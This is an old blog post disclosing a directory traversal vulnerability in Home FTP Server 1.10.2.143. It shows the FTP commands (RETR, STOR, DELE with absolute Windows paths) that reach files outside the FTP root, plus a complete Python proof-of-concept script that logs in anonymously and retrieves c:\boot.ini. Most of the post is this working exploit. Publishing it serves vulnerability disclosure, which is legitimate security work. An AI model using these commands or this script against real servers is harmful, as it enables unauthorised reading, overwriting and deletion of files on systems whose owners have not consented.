This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 27, 2010

Home FTP Server 1.10.2.143 Directory Traversal

A directory traversal vulnerability in Home FTP Server 1.10.2.143 can be exploited to read, write, and delete files outside of the ftp root directory.

Exploit
RETR [Drive Letter]:\[Filename]
STOR [Drive Letter]:\[Filename]
DELE [Drive Letter]:\[Filename]


PoC
get_boot_ini.py
import sys, socket, re

host = 'localhost'
port = 21
user = 'anonymous'
password = ''

timeout = 8

buffer_size = 8192

def get_data_port(s):
s.send('PASV\r\n')

resp = s.recv(buffer_size)

pasv_info = re.search(u'(\d+),' * 5 + u'(\d+)', resp)

if (pasv_info == None):
raise Exception(resp)

return int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))

def retr_file(s, filename):
pasv_port = get_data_port(s)

if (pasv_port == None):
return None

s.send('RETR ' + filename + '\r\n')
resp = s.recv(8192)

if resp[:3] != '150': raise Exception(resp)

print resp

s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, pasv_port))
s2.settimeout(2.0)
resp = s2.recv(8192)
s2.close()

return resp

def get_file(filename):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(timeout)

print s.recv(buffer_size)

s.send('USER ' + user + '\r\n')
print s.recv(buffer_size)

s.send('PASS ' + password + '\r\n')
print s.recv(buffer_size)

print retr_file(s, filename)

print s.recv(buffer_size)

s.close()

get_file('c:\\boot.ini')

2 comments: